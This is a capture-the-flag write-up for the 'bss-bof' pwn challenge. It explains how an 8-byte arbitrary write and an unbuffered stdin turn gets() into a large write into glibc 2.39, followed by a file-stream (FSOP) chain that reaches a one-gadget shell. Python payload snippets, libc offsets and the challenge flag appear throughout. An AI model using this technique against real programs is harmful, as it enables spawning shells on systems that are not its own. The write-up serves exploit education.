# BSS BOF Writeup ## Challenge The binary is very small: ```c // gcc -Wl,-z,now,-z,relro main.c -o bss-bof #include #include char buf[8]; int main() { uint64_t* dest = 0; printf("printf: %p\n", printf); read(0, &dest, 8); read(0, dest, 8); gets(buf); } __attribute__((constructor)) void setup() { setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); } ``` The obvious reading is “classic `gets` overflow on a BSS buffer”, but that is not the interesting part of the challenge. ## Initial observations The binary has all the usual protections: - PIE - Full RELRO - NX - stack canary - CET (`SHSTK`, `IBT`) So the `gets(buf)` call is not directly useful as a normal control-flow overwrite: - `buf` is in `.bss`, not on the stack - there is no nearby function pointer in the binary that is easy to target - Full RELRO blocks GOT overwrites - PIE means the binary base is unknown What we do have is: 1. A libc leak from `printf("printf: %p\n", printf);` 2. An 8-byte arbitrary write from: ```c read(0, &dest, 8); read(0, dest, 8); ``` That is enough for a libc-only exploit. ## Libc base The challenge image is Ubuntu 24.04, so the shipped libc is glibc 2.39. The `printf` leak gives the libc base immediately: ```python libc_base = printf_addr - 0x60100 ``` The important libc offsets used by the exploit are: - `printf` = `0x60100` - `_IO_2_1_stdin_` = `0x2038e0` - `_IO_list_all` = `0x2044c0` - `_IO_2_1_stderr_` = `0x2044e0` - `_IO_2_1_stdout_` = `0x2045c0` - `_IO_wfile_jumps` = `0x202228` - one-gadget = `0xef52b` ## The real primitive: turn `gets` into a large libc write The constructor makes `stdin` unbuffered: ```c setvbuf(stdin, NULL, _IONBF, 0); ``` For glibc stdio this matters a lot. Unbuffered `stdin` uses the internal 1-byte `_shortbuf` inside the `FILE` object. Right before `gets`, the relevant `stdin` fields look like this: - `_IO_read_ptr == _IO_read_end` - `_IO_buf_base == stdin + 0x83` - `_IO_buf_end == stdin + 0x83` `stdin + 0x83` is `_IO_2_1_stdin_._shortbuf`. The first arbitrary write is used to overwrite: - `stdin->_IO_buf_end` at offset `0x40` with a much larger address: ```python new_end = stdin + 0x83 + payload_len ``` So the first 16 bytes we send are: ```python send(p64(stdin + 0x40)) # destination send(p64(new_end)) # new _IO_buf_end ``` Then `gets(buf)` runs. Since `_IO_read_ptr == _IO_read_end`, glibc refills `stdin` via the underflow path: - `_IO_gets` - `__uflow` - `_IO_file_underflow` - `_IO_file_read` That read uses: - destination = `stdin->_IO_buf_base` - length = `stdin->_IO_buf_end - stdin->_IO_buf_base` Because we enlarged `_IO_buf_end`, glibc performs a large `read()` directly into libc memory starting at `stdin->_shortbuf`. This is the core trick. ## Why the payload starts with `\\n` `gets` stops when it sees a newline, but that newline is checked only after glibc has already performed the underflow read into libc memory. So the big payload starts with: ```python payload = b"\n" + ... ``` That gives us two nice properties: 1. glibc still reads the whole staged blob into libc 2. `gets` immediately returns after consuming the first byte At that point, libc’s stdio structures are corrupted and the program simply exits into our FSOP chain. ## Important detail: the read starts inside `stdin` itself The large read starts at `_shortbuf`, which is at offset `0x83` inside `_IO_2_1_stdin_`. That means the first bytes of the payload do **not** hit `_IO_list_all` immediately. They first overwrite the tail of the live `stdin` object itself: - `_lock` - `_offset` - `_codecvt` - `_wide_data` - `_freeres_*` - `_mode` If those bytes are left as zeroes, `gets` crashes before the process even reaches exit. So the payload must preserve the live `stdin` tail first: ```python wq(0x05, libc_base + STDIN_LOCK_OFF) wq(0x0D, 0xFFFFFFFFFFFFFFFF) wq(0x15, 0) wq(0x1D, libc_base + WIDE_STDIN_OFF) wq(0x25, 0) wq(0x2D, 0) wq(0x35, 0) wd(0x3D, 0xFFFFFFFF) ``` Those offsets are relative to the beginning of the big read, i.e. relative to `stdin->_shortbuf`. ## From large libc write to code execution The cleanest target is exit-time stdio cleanup. On exit, glibc walks `_IO_list_all` and flushes streams via `_IO_flush_all`. The payload overwrites: - `_IO_list_all` so it points to `stderr` - the real `stderr` object so it becomes a fake wide `FILE` - the real `stdout` object so it becomes fake `_IO_wide_data` - memory after `stdout` so it becomes a fake codecvt structure ### Fake `FILE` at `stderr` The fake stream is built on top of `_IO_2_1_stderr_`: ```python wq(LIST_REL, stderr) wd(STDERR_REL + 0x00, 0) # _flags wq(STDERR_REL + 0x68, 0) # _chain wq(STDERR_REL + 0x88, lock) # _lock wq(STDERR_REL + 0xa0, wide) # _wide_data -> stdout wd(STDERR_REL + 0xc0, 1) # _mode > 0 wq(STDERR_REL + 0xd8, libc_base + WFILE_JUMPS_OFF) ``` This makes `_IO_flush_all` treat `stderr` as a wide stream and dispatch into `_IO_wfile_overflow`. ### Fake `_IO_wide_data` at `stdout` The fake wide-data object lives on top of `_IO_2_1_stdout_`: ```python wq(STDOUT_REL + 0x18, 0) wq(STDOUT_REL + 0x20, 4) wq(STDOUT_REL + 0x30, 0) wq(STDOUT_REL + 0x38, 0) wq(STDOUT_REL + 0xe0, codecvt) ``` The important part is: - `write_ptr > write_base`, so glibc believes there is buffered wide output - the allocation-related pointers are zero, so the code takes the allocation path - `wide_data + 0xe0` points to our fake codecvt object ### The indirect call The useful path is: - `_IO_flush_all` - `_IO_wfile_overflow` - `_IO_wdoallocbuf` Inside `_IO_wdoallocbuf`, glibc performs an indirect call through the fake codecvt structure: ```c call [fake_codecvt + 0x68] ``` So we fully control RIP. ## One-gadget choice The exploit uses libc one-gadget: - `0xef52b` Its shape is: ```c execve("/bin/sh", rbp-0x50, [rbp-0x78]) ``` The constraints matched the actual state at the indirect call: - `rbp-0x50` is writable - `[rbp-0x78] == NULL` - `rax` points to our fake codecvt object This gadget accepts either `rax == NULL` or `rax` being a valid `argv[1]` string. So the fake codecvt begins with `"-p\x00"`: ```python payload[STDOUT_REL + 0x120:STDOUT_REL + 0x123] = b"-p\x00" wq(STDOUT_REL + 0x120 + 0x68, libc_base + ONE_GADGET_OFF) ``` That yields a valid argument vector like: ```c ["/bin/sh", "-p", NULL] ``` and the process spawns a shell during exit processing. ## Exploit flow Putting it together: 1. Read the leaked `printf` address and compute libc base. 2. Use the 8-byte arbitrary write to set `stdin->_IO_buf_end` to `stdin->_shortbuf + payload_len`. 3. Send a large payload beginning with `\n`. 4. `gets` triggers an underflow read that copies the payload into libc starting at `stdin->_shortbuf`. 5. The early part of the payload preserves the live tail of `stdin`. 6. The rest overwrites `_IO_list_all`, `stderr`, `stdout`, and the fake codecvt object. 7. `gets` returns immediately because the first byte was newline. 8. The process exits, `_IO_flush_all` walks our fake stream, and glibc reaches the controlled indirect call. 9. The one-gadget executes `execve("/bin/sh", ...)`. ## Script The final exploit is in [solve.py](https://github.com/prathamgupta36/CTF-Writeups/blob/main/2026/tkbctf5_2026/pwn/bss-bof/solve.py). Local test: ```bash python3 solve.py CMD='echo READY; /bin/echo WORKED; exit' ``` Remote: ```bash python3 solve.py REMOTE=1 ``` ## Flag ```text tkbctf{b0kug4_s4k1n1_so1v3r_w0_k4k1o3tan0n1} ```